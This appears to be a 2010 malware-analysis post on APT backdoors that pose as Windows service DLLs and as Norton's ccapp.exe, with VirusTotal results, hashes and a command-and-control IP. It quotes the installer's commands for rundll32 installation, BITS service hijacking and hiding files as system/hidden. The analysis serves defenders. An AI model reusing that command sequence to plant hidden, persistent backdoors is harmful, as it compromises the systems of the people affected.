"Description"="Enables authentication,authorization and accounting of dial-up and VPN users.IAS support the RADIVS protocol"

replaced with ias.dll
File iass.dll received on 2010.07.05 04:11:40 (UTC)

http://www.virustotal.com/analisis/bfaedcb770769f0063a15a429f9e68c12fe0b5e4d13d1850a31c32a1177fb3b1-1278303100
Result: 18/41 (43.90%)
a-squared 5.0.0.31 2010.07.05 Packer.RLPack!IK
AntiVir 8.2.4.2 2010.07.04 TR/Crypt.XPACK.Gen
Authentium 5.2.0.5 2010.07.04 W32/RLPacked.A.gen!Eldorado
Avast 4.8.1351.0 2010.07.04 Win32:Malware-gen
Avast5 5.0.332.0 2010.07.04 Win32:Malware-gen
AVG 9.0.0.836 2010.07.04 BackDoor.Generic12.BLMD
BitDefender 7.2 2010.07.05 Gen:Packer.RLPack.D.ai5aaiqnctm
Comodo 5321 2010.07.05 Heur.Pck.RLPack
F-Prot 4.6.1.107 2010.07.04 W32/RLPacked.A.gen!Eldorado
F-Secure 9.0.15370.0 2010.07.05 Gen:Packer.RLPack.D.ai5aaiqnctm
GData 21 2010.07.05 Gen:Packer.RLPack.D.ai5aaiqnctm
Ikarus T3.1.1.84.0 2010.07.05 Packer.RLPack
McAfee-GW-Edition 2010.1 2010.07.04 Heuristic.LooksLike.Win32.Suspicious.C
Microsoft 1.5902 2010.07.03 Backdoor:Win32/Pingbed.A
nProtect 2010-07-04.02 2010.07.04 Gen:Packer.RLPack.D.ai5aaiqnctm
Panda 10.0.2.7 2010.07.04 Suspicious file
Sophos 4.54.0 2010.07.05 Sus/Encpk-MV
TrendMicro 9.120.0.1004 2010.07.05 PAK_Generic.001
Additional information
File size: 16048 bytes
MD5   : 426f6471b612cf7bb32130fee94cf4c3

Other example of a backdoor file, which does not run as a service. It runs as a separate process and  with the same name ccapp.exe, which is a name of Symantec/Norton Antivirus’ real-time scanner.  

ccapp.exe  19/41 FFA85CB60C3572198A520B866FAE8B15

http://www.virustotal.com/analisis/1e8c1bebcad3a7e475a97bdd2e7197d0925db7206e2cdc811eae91dab60fc360-1278304000

 File ccapp.exe received on 2010.07.05 04:26:40 (UTC)
Result: 19/41 (46.34%)
AhnLab-V3     2010.07.03.00     2010.07.03     Win32/MalPackedB.suspicious
AntiVir     8.2.4.2     2010.07.04     TR/Crypt.ZPACK.Gen
Authentium     5.2.0.5     2010.07.04     W32/Fujack.U
Avast     4.8.1351.0     2010.07.04     Win32:Malware-gen
Avast5     5.0.332.0     2010.07.04     Win32:Malware-gen
AVG     9.0.0.836     2010.07.04     Win32/Virut.Z
BitDefender     7.2     2010.07.05     Gen:Trojan.Packed.Heur.aiWaKJ7zCbc
Comodo     5321     2010.07.05     TrojWare.Win32.TrojanSpy.KeyLogger.~d02
F-Prot     4.6.1.107     2010.07.04     W32/Fujack.U
F-Secure     9.0.15370.0     2010.07.05     Gen:Trojan.Packed.Heur.aiWaKJ7zCbc
GData     21     2010.07.05     Gen:Trojan.Packed.Heur.aiWaKJ7zCbc
Microsoft     1.5902     2010.07.03     Backdoor:Win32/Pingbed.A
Norman     6.05.10     2010.07.04     Fujack.T
nProtect     2010-07-04.02     2010.07.04     Gen:Trojan.Packed.Heur.aiWaKJ7zCbc
Panda     10.0.2.7     2010.07.04     Suspicious file
Sunbelt     6544     2010.07.05     Trojan.Crypt.AntiSig.b (v)
Symantec     20101.1.0.89     2010.07.05     Suspicious.MH690.A
ViRobot     2010.7.3.3920     2010.07.04     Backdoor.Win32.IRCBot.35288
VirusBuster     5.0.27.0     2010.07.04     Packed/RLPack
Additional information
File size: 14257 bytes
MD5   : ffa85cb60c3572198a520b866fae8b15

 ------------------------ end of July 16, 2010 update-------------------------

qmqr.dll or qmqrprxy.dll

C:\WINDOWS\system32\qmqrprxy.dll (32768 Bytes.) - qmqrprxy.dll to replace legitimate BITs service file qmgr.dll - in 

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BITS\Parameters

 

Command sequence:

creates

C:\del.bat (56 Bytes.)

installs 

cmd /c rundll32 qmqrprxy.dll,RundllInstall

restarts BITS

cmd /c net stop bits

cmd /c net start bits 

sets attribute to system hidden

cmd /c attrib +h +s qmqrprxy.dll

cmd /c del.bat    - deletes the batch file

BITS firewall bypass - backdoor - see explanation here New Attack Piggybacks on Microsoft's Patch Service or here  Обход фаеров с использованием BITS 

TCP traffic 58.33.154.102:443

Hostname:    102.154.33.58.broad.xw.sh.dynamic.163data.com.cn
ISP:    ChinaNet Shanghai Province Network
Organization:    ChinaNet Shanghai Province Network
Country:    China
State/Region:    Shanghai

 File qmqrprxy.dll received on 2010.06.07 20:28:13 (UTC)  - originally was 2/41 on VT

http://www.virustotal.com/analisis/a48c83859d3430c6fc5606ba8da4c38353cb1a93cb01e7f53e3122600147cc26-1275942493
Result: 25/41 (60.98%)
a-squared    5.0.0.26    2010.06.07    Trojan-Downloader.Win32.Small!IK
AhnLab-V3    2010.06.06.00    2010.06.06    Win-Trojan/Atraps.32768.N
AntiVir    8.2.2.6    2010.06.07    TR/ATRAPS.Gen
Avast    4.8.1351.0    2010.06.07    Win32:Malware-gen
Avast5    5.0.332.0    2010.06.07    Win32:Malware-gen
AVG    9.0.0.787    2010.06.07    BackDoor.Generic12.KBM
BitDefender    7.2    2010.06.07    Trojan.Generic.2664831
CAT-QuickHeal    10.00    2010.06.07    Trojan.Agent.ATV
Comodo    5020    2010.06.07    TrojWare.Win32.GameThief.Nilage.~CRSH
F-Secure    9.0.15370.0    2010.06.07    Trojan.Generic.2664831
GData    21    2010.06.07    Trojan.Generic.2664831
Ikarus    T3.1.1.84.0    2010.06.07    Trojan-Downloader.Win32.Small
Kaspersky    7.0.0.125    2010.06.07    Backdoor.Win32.Small.iog
McAfee-GW-Edition    2010.1    2010.06.07    Heuristic.BehavesLike.Win32.Downloader.H
Microsoft    1.5802    2010.06.07    TrojanDownloader:Win32/Troxen!rts
NOD32    5180    2010.06.07    a variant of Win32/Agent.WQS
Norman    6.04.12    2010.06.07    W32/Atraps.EZM
nProtect    2010-06-07.01    2010.06.07    Trojan.Generic.2664831
Panda    10.0.2.7    2010.06.07    Trj/CI.A
PCTools    7.0.3.5    2010.06.07    Trojan.ADH
Prevx    3.0    2010.06.07    High Risk Worm
Sunbelt    6416    2010.06.07    Trojan.Win32.Small
Symantec    20101.1.0.89    2010.06.07    Trojan.ADH
TrendMicro    9.120.0.1004    2010.06.07    BKDR_SMALL.LOP
TrendMicro-HouseCall    9.120.0.1004    2010.06.07    BKDR_SMALL.LOP
Additional information
File size: 32768 bytes

MD5...: 03b3cceb253fd782590cf0efafd49d5f

There can be a few other files as well, this is a basic pack that is needed to pull it off. I will be adding more files related to this type of attack and other APT malware but feel free to email me if you have questions or comments.